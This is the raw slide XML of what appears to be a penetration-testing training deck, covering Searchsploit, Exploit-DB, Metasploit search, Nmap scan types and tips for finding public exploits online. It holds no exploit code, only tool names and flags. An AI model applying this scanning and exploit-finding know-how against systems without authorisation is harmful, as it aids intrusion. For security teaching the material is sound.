            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Using Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59D137BE-4A0B-4E8F-A5C4-808532C7AD96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="1417320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can view and copy exploits in-place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-x [ID] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– View</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-m [ID] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Copy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9B53D6A-1066-44BC-8A52-427746833B3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4197197" y="1837566"/>
            <a:ext cx="7361723" cy="1417319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A83CCDC3-4102-41C7-B4C9-DE12103981BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="918" r="45328" b="37283"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6498902" y="2712721"/>
            <a:ext cx="5060396" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DBE8480-82AF-4A7C-B44F-7900A8D126F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2237638" y="4448589"/>
            <a:ext cx="7716724" cy="1924746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2365158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A0E319-0DB8-42C8-838A-A5AA1ACB0F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E19B50D-8815-473B-866E-E9D3F5967E5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finding Exploits - Exploit-DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6C5DEF2-A0A3-42AF-9468-D428CD43F0FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="563880"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Essentially the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A15A89-69DF-4D97-85C7-EC96929447EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="42847"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="414337" y="2189774"/>
            <a:ext cx="6494463" cy="3204548"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D684A8D-6EDE-449D-91E8-38C16D4A47BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2631440" y="3526772"/>
            <a:ext cx="1018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Verified</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E761C685-7AEB-46A4-8CBE-4A465A698D2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2783840" y="3896104"/>
            <a:ext cx="356746" cy="23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D5AA845-83B1-4034-B682-31AC42B2388A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417555" y="4049726"/>
            <a:ext cx="8456212" cy="2197550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0EFEE9B-69C1-4CD7-9770-D3BD349C94C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364480" y="5753120"/>
            <a:ext cx="1381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Download</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73E4858E-6DCF-4F33-99B4-4C6404240D11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6055360" y="5590904"/>
            <a:ext cx="487680" cy="1622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17DD41-0943-4BDB-866C-1AFD7304FDDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6898640" y="5749092"/>
            <a:ext cx="1381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Raw text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32A7759A-A347-4A2D-AF20-FDE243A7464F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="23" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7023210" y="5590904"/>
            <a:ext cx="566310" cy="1581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4810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C53D8-3111-440C-944E-F4CB87DF3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7B28C51-DB66-48EB-9C30-84EF1CE04EB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finding Exploits - Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4DD0BD1-6CED-4423-8406-6150B9011932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="1137082"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Built-in search, similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit uses ‘modules’ doing a variety of functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{010862C6-2A2D-4F21-87B2-026BB2711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715"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2184477" y="2263806"/>
            <a:ext cx="7823045" cy="36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6586B0D9-CE25-4FF3-801A-37EF28A751C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2630683" y="3196416"/>
            <a:ext cx="560191" cy="2699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5F778FF-F045-4EB3-9A31-1E0B31288DA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8145658" y="2814449"/>
            <a:ext cx="760217" cy="3081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061CD8C-E158-4784-875D-8CA579056916}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905875" y="2814449"/>
            <a:ext cx="560191" cy="3081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8660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C53D8-3111-440C-944E-F4CB87DF3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7B28C51-DB66-48EB-9C30-84EF1CE04EB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finding Exploits - Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4DD0BD1-6CED-4423-8406-6150B9011932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="1137082"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Built-in search, similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy to find and use – can reference by line number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D164B58-93F8-48C4-B4B2-2DA768FAC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50" y="2425299"/>
            <a:ext cx="8028620" cy="1991342"/>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B4AD4199-29FB-44C7-A7FA-E0E61628B3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509"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3586702" y="3908610"/>
            <a:ext cx="8171248" cy="2092695"/>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5FA176B-A372-40A9-8BA8-F0B4B745DE9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820934" y="3975285"/>
            <a:ext cx="436366" cy="225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665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(1/6)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4338" y="2406607"/>
            <a:ext cx="11513502" cy="4063119"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identifies ports that are listening, closed, or filtered on a target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nmap is the primary tool, though you can create your own</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bare Minimum Syntax: 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;IP&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Types of scans: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sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Only sends the SYN portion of TCP handshake, requires root permission</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sT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Completes the TCP handshake and sends a RST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Others: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sU</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sA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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6826259F-8192-42D4-BDFB-22B35CE5EAFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="6126" b="29377"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2090178" y="1222512"/>
            <a:ext cx="8011643" cy="1081377"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F42F90C-AD1E-44F0-8A94-BA6C1CE13C5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8078831" y="1199263"/>
            <a:ext cx="202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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B766B9FD-26DC-45C4-AC57-610AE65C5DE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1913769" y="5658737"/>
            <a:ext cx="8364462" cy="566530"/>
            <a:chOff x="3311600" y="4288245"/>
            <a:chExt cx="8364462" cy="566530"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D212B94-CB0B-4E23-9833-8B57E55CF0D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect r="22170" b="91739"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3311600" y="4288245"/>
              <a:ext cx="8364462" cy="566530"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A007555E-553E-4131-B65D-0BBB919ECED8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6399854" y="4290078"/>
              <a:ext cx="1620078" cy="2054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5760096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0EA324-5A60-4233-B38F-61FD5B2F5C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55C8005-2241-4064-B797-69B6F2BCD35E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finding Exploits – Google (duh!)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E6796CB-3DDB-4192-9ED1-DB8C7905A916}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="5488622" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good sources:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Personal/security blogs (Rapid7, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PacketStorm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GitHub</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Hack the Box Write-ups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B2DF16C-FBFB-4A2D-903F-44362F1B89FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5902961" y="1276177"/>
            <a:ext cx="6209983" cy="252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General Tips</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Start broad – no version number(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" marR="0" lvl="2"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200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Drill into versions if you get hits</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Don’t forget Google dorks</a:t>
            </a:r>
          </a:p>
          <a:p>
